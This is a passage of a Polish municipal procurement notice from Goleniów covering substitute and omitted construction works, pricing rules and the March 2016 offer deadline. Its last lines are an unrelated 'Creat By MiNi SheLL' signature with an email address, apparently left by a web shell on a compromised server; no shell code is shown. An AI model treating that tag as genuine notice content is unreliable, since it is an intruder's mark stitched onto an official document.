d)	udzielenie zamówień uzupełniających w zakresie wskazanym w specyfikacji istotnych warunków zamówienia.
8. Jeżeli zajdzie konieczność zaniechania wykonania robót objętych projektem budowlanym i kosztorysem ofertowym, Inspektor Nadzoru i Kierownik Budowy sporządzą protokół konieczności robót zaniechanych, określający zakres rzeczowo-finansowy robót koniecznych do zaniechania.




9. Jeżeli zajdzie konieczność wykonania robót zamiennych nie objętych kosztorysem ofertowym, Inspektor Nadzoru i Kierownik Budowy sporządzą protokół konieczności wykonania robót zamiennych, określający zakres rzeczowo-finansowy tych robót. Jeśli na postawie kosztorysu ofertowego nie będzie możliwości określenia kosztów strony umowy określają, iż rozliczenie tych robót nastąpi w oparciu o średnie ceny materiałów, sprzętu, transportu i robocizny, publikowane w wydawnictwie Sekocenbud dla kwartału, w którym kalkulacja będzie sporządzana lub/i innych ogólnie stosowanych katalogach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.goleniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta, Plac Lotników 1, 72-100 Goleniów pok.212.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2016 godzina 08:45, miejsce: Urząd Gminy i Miasta, Plac Lotników 1, 72-100 Goleniów pok.212.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com